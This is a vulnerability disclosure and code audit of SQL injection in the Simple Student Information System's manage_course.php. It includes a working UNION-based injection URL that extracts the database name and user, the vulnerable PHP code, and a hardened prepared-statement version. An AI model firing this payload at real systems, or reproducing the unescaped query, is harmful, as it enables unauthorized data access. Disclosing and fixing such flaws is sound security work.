PHP Code Audit: Simple Student Information System manage_course.php SQL Injection
source link: https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Simple%20Student%20Information%20System%20manage_course.php%20SQL%20Injection/
Vendor Homepage: https://www.sourcecodester.com
Source Code Download:
Payload
Simple Student Information System SQL Injection
http://192.168.1.8/sis/admin/courses/manage_course.php?id=-6659%27%20%20union%20select%201,2,database(),user(),5,6,7,8--%20-
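Vulnerable code: admin/courses/manage_course.php, lines 1-13:
<?php
require_once('../../config.php');
if(isset($_GET['id'])){
    // $_GET['id'] is interpolated into the quoted SQL string without escaping (the injection point)
    $qry = $conn->query("SELECT * FROM `course_list` where id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        $res = $qry->fetch_array();
        // Copy every named column of the row into a variable of the same name
        foreach($res as $k => $v){
            if(!is_numeric($k))
                $$k = $v;
        }
    }
}
?>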
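The `id` parameter lands inside a single-quoted SQL literal, so a quote in the request closes the literal and the rest of the value is parsed as SQL. A hardened form of the same lookup follows as an added example; it is not the vendor's code and not from the original post. It assumes `$conn` from `config.php` is a `mysqli` connection (as the `->query()` / `->num_rows` calls suggest), and `fetch_course` is a hypothetical helper name.

```php
<?php
// Added example, not the project's code. Assumes $conn is a mysqli object
// created in config.php; fetch_course() is a hypothetical helper.

/**
 * Return the course row for $rawId as an associative array,
 * or null when the id is not an integer or no row matches.
 */
function fetch_course(mysqli $conn, $rawId): ?array
{
    // Reject anything that is not a plain integer (quotes, spaces, UNION, arrays)
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }

    // The placeholder keeps the value out of the SQL text, so it is never parsed as SQL
    $stmt = $conn->prepare('SELECT * FROM `course_list` WHERE id = ?');
    if ($stmt === false) {
        throw new RuntimeException('Could not prepare course lookup');
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() requires the mysqlnd driver
    $stmt->close();

    return $row ?: null;
}

require_once('../../config.php');

// Keep the row in one array instead of `$$k = $v`, so column names
// cannot overwrite variables that already exist in this scope.
$course = null;
if (isset($_GET['id'])) {
    $course = fetch_course($conn, $_GET['id']);
}
?>
```

When the page later prints fields from `$course`, pass each one through `htmlspecialchars()` so stored values are not rendered as markup.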